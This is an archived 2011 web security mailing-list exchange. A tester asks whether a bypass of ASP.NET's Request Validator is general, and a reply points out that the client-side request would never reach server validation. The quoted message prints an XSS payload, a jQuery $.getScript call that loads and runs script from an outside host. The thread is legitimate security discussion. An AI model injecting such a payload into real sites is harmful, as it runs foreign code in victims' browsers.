[WEB SECURITY] ASP.NET Request Validator Bypass?

steve jensen sjensen1207 at hotmail.com
Sat Feb 19 13:04:52 EST 2011


If this jQuery .getScript request is only performed client-side, then it wouldn't even be sent to the server-side ASP.NET XSS validation to be bypassed.

Date: Sat, 19 Feb 2011 15:39:06 +0000
From: ryandewhurst at gmail.com
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?

Hi,

Recently on a client test I was able to bypass the ASP.NET Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. 


I was wondering if anyone could confirm whether my bypass affects all ASP.NET installations or whether or not this particular client had it configured incorrectly.

I used the following jQuery function to bypass the filter:

$.getScript('//ha.ckers.org/.j');


Thanks,
Ryan
Ryan Dewhurst

blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk | www.webwordcount.com

twitter www.twitter.com/ethicalhack3r

